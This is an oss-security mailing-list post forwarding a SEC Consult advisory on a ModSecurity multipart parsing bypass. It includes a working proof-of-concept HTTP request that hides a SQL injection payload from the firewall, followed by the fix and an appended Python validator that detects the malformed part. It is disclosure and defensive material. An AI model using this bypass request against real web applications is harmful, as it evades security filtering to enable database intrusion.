Message-Id: <201210171047.53032.mweckbecker@suse.de>
Date: Wed, 17 Oct 2012 10:47:52 +0200
From: Matthias Weckbecker <mweckbecker@...e.de>
To: oss-security@...ts.openwall.com
Subject: CVE request: Fwd: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass

Hi Steve, Kurt, vendors,

this flaw looks slightly different from the last one and apparently has not
got a CVE yet.

---------- Forwarded Message ----------

Subject: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass
Date: Wednesday 17 October 2012
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >
=======================================================================
              title: ModSecurity multipart/invalid part ruleset bypass
            product: ModSecurity
 vulnerable version: <= 2.6.8
      fixed version: 2.7.0
         CVE number: -
             impact: Depends what you use it for
           homepage: http://www.modsecurity.org/
              found: 2012-10-12
                 by: Bernhard Mueller
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
ModSecurity for Apache is a web server plug-in for the Apache web server
platform. This is the original, most mature and deployed ModSecurity module.
This module is maintained by the Trustwave SpiderLabs Research Team.

URL: http://www.modsecurity.org/projects/modsecurity/apache/

Vulnerability overview/description:
-----------------------------------
Validation of POST parameters can be bypassed on Apache/PHP installations by
sending specially formed multipart requests. A POST parameter's content can be
hidden from ModSecurity by prepending an invalid part.
This first part contains only a Content-Disposition header and has an
additional carriage return inserted at the end of the line ([\r\r\n]). This is
followed by a boundary in the next line and another Content-Disposition header
with a filename. The request content looks like this (newlines are all \r\n
except in line 2).

--A
Content-Disposition: form-data; name="id"[\r][\r][\n]
--A
Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
--A--

ModSecurity skips what it believes to be an invalid first part and proceeds to
parse the second part. This part is treated as a file and not checked against
the ruleset. PHP however treats the whole thing as a single part and processes
only the first Content-Disposition header, ignoring the second one. In the
opinion of PHP this request contains a POST parameter with the name specified
in the first header.

Proof of concept:
-----------------

wut.php:
--------
<?php echo $_POST['xxx']; ?>

POST request:
-------------
POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
--A--

Output:
-------
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)

Vulnerable / tested versions:
-----------------------------
This works with ModSecurity up to version 2.6.8.

Vendor contact timeline:
------------------------
2012-10-11: Contacted ModSecurity
2012-10-15: ModSecurity guys fixed it
2012-10-16: New ModSecurity release 2.7.0
2012-10-17: Public release of advisory

Solution:
---------
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation
rule. Add the line:

IQ %{MULTIPART_INVALID_PART}, \

to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.
Download is available at:
http://www.modsecurity.org/download/

Advisory URL:
--------------
https://www.sec-consult.com/en/advisories.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SEC Consult Group

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

Office Singapore
4 Battery Road
#25-01 Bank of China Building
Singapore (049908)
Mail: office at sec-consult dot sg

Check out our blog at: http://blog.sec-consult.com/
And this thing here: http://wordpress.org/extend/plugins/mvis-security-center/

EOF B. Mueller / October 2012

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-------------------------------------------------------

--
Matthias Weckbecker, Senior Security Engineer, SUSE Security Team
SUSE LINUX Products GmbH, Maxfeldstr. 5, D-90409 Nuernberg, Germany
Tel: +49-911-74053-0; http://suse.com/
SUSE LINUX Products GmbH, GF: Jeff Hawn, HRB 16746 (AG Nuernberg)
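As an added illustration, not ModSecurity's or SEC Consult's code, the Python below is a strict multipart validator that reports the malformed first part of the advisory's request instead of skipping it, which is the behaviour the MULTIPART_INVALID_PART flag is meant to give you. The request body is reconstructed from the proof of concept above, assuming a final CRLF after the closing delimiter (which yields exactly the 161 bytes the advisory's Content-Length states); the function names are my own.

```python
import re

CRLF = b"\r\n"
HEADER_RE = re.compile(rb"^[A-Za-z0-9-]+:[ \t]*[^\r\n]*$")

# Body of the advisory's PoC request, reconstructed byte for byte: the first
# part's header line ends in CR CR LF, all other lines in CR LF (161 bytes,
# matching the Content-Length in the advisory; final CRLF is an assumption).
POC_BODY = (
    b"--A\r\n"
    b'Content-Disposition: form-data; name="xxx"\r\r\n'
    b"--A\r\n"
    b'Content-Disposition: form-data; name="yyy"; filename="z"\r\n'
    b"\r\n"
    b"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n"
    b"--A--\r\n"
)


def validate_part(index, raw):
    """Strict checks on one part; returns a list of findings (empty = clean)."""
    if not raw.startswith(CRLF):
        return [f"part {index}: boundary line not terminated by CRLF"]
    raw, findings = raw[2:], []
    sep = raw.find(CRLF + CRLF)
    # No empty line after the headers means the part has no body; this is the
    # condition the MULTIPART_INVALID_PART flag reports instead of skipping.
    if sep == -1:
        findings.append(f"part {index}: MULTIPART_INVALID_PART (no empty line after headers)")
    headers = raw if sep == -1 else raw[:sep]
    # A CR not followed by LF in the header block is the advisory's \r\r\n trick.
    if re.search(rb"\r(?!\n)", headers):
        findings.append(f"part {index}: bare CR inside header block")
    for line in headers.rstrip(CRLF).split(CRLF):
        if not HEADER_RE.match(line):
            findings.append(f"part {index}: malformed header line {line!r}")
    return findings


def strict_multipart_check(body, boundary):
    """Validate every part; a non-empty result means the request should be denied."""
    findings = []
    for i, raw in enumerate(body.split(b"--" + boundary)[1:]):
        if raw.startswith(b"--"):
            break  # closing delimiter reached
        findings.extend(validate_part(i, raw))
    return findings
```

Running `strict_multipart_check(POC_BODY, b"A")` flags part 0 twice (no header terminator, bare CR), which is the signal a strict rule should turn into a 403 rather than letting the second part through as an unchecked file.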